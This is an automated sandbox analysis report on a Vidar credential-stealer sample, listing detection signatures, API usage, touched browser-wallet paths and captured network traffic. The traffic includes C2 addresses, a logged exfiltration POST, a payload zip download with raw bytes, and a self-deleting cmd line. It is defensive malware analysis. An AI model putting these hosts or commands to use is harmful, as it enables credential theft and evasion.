Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 756295
MD5: 5367709f0a96713b5c9a518e13f306d6
SHA1: 244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256: 2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
Tags: exe
Infos:

Detection

Vidar
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Uses a known web browser user agent for HTTP communication
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 32%
Source: file.exe Virustotal: Detection: 36% Perma Link
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C670 __EH_prolog3_GS,_memset,lstrcat,lstrcat,lstrcat,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,_memset,lstrcat,lstrcat,lstrcat,lstrcat,CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,_memset,_memset, 2_2_0040C670
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F7E5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 2_2_0040F7E5
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040FA24 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, 2_2_0040FA24
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F5CF _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, 2_2_0040F5CF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F78C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_0040F78C
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040C3ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412548
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset, 2_2_004135E2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_00409DF4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00411603
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040D624
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW, 2_2_00417F60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_004118D3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset, 2_2_00409284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 2_2_004132B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA, 2_2_0040A392
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/asifrazatg
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:10:04 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://116.202.6.206:80
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/1148
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/233910279258.zip
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zip
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zip8C
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199439929669
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: file.exe, file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatg
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatg&
Source: file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040E905
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004182AF _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_004182AF

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041E31F 2_2_0041E31F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00406050 2_2_00406050
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00405850 2_2_00405850
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042101A 2_2_0042101A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004069EB 2_2_004069EB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0043127F 2_2_0043127F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00432BE4 2_2_00432BE4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004213EC 2_2_004213EC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00420C7C 2_2_00420C7C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00430D2E 2_2_00430D2E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041B5A7 2_2_0041B5A7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00421E20 2_2_00421E20
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00431EAC 2_2_00431EAC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041D766 2_2_0041D766
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00407F35 2_2_00407F35
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004317D0 2_2_004317D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004217D4 2_2_004217D4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004207E7 2_2_004207E7
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404114 appears 74 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00423610 appears 38 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00428900 appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00423679 appears 41 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.231270305.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000001.00000002.232909854.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe ReversingLabs: Detection: 32%
Source: file.exe Virustotal: Detection: 36%
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
